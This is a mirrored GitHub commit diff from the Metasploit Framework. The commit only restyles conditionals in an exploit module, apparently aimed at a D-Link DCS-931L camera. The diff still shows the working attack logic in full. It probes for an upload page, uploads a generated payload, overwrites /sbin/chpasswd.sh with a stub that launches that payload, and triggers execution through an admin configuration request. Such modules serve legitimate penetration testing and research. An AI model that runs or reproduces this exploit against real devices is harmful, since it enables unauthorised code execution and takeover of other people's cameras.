1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Use unless instead of if !

This commit is contained in:
wchen-r7 2016-01-05 13:05:01 -06:00
parent 7907c93047
commit 7259d2a65c

View File

@ -68,16 +68,21 @@ class Metasploit4 < Msf::Exploit::Remote
def check
res = send_request_cgi(
'uri' => normalize_uri('uploadfile.htm'),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']))
if !res
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']
))
unless res
vprint_status("#{peer} - The connection timed out.")
return Exploit::CheckCode::Unknown
elsif res && res.code && res.code == 404
end
if res.code && res.code == 404
vprint_status("#{peer} - uploadfile.htm does not exist")
return Exploit::CheckCode::Safe
elsif res && res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS-931L"/
elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/
vprint_error("#{peer} - Authentication failed")
return Exploit::CheckCode::Detected
elsif res && res.code && res.code == 200 && res.body && res.body =~ /Upload File/
elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
@ -88,11 +93,14 @@ class Metasploit4 < Msf::Exploit::Remote
# upload payload
res = upload(payload_path, generate_payload_exe)
if !res
unless res
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
elsif res && res.code && res.code == 404
end
if res.code && res.code == 404
fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
elsif res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
print_good("#{peer} - Payload uploaded successfully")
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload")
@ -101,11 +109,14 @@ class Metasploit4 < Msf::Exploit::Remote
# overwrite /sbin/chpasswd.sh with stub
res = upload('/sbin/chpasswd.sh', "#!/bin/sh\n#{payload_path}&\n")
if !res
unless res
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
elsif res && res.code && res.code == 404
end
if res.code && res.code == 404
fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
elsif res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
print_good("#{peer} - Stager uploaded successfully")
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager")
@ -121,11 +132,14 @@ class Metasploit4 < Msf::Exploit::Remote
'ReplyErrorPage' => 'errradv.htm',
'ConfigSystemAdmin' => 'Apply'
}.to_a.shuffle])
if !res
unless res
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
elsif res && res.code && res.code == 401
end
if res.code && res.code == 401
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
elsif res && res.code && res.code == 200 && res.body
elsif res.code && res.code == 200 && res.body
print_good("#{peer} - Payload executed successfully")
else
fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed")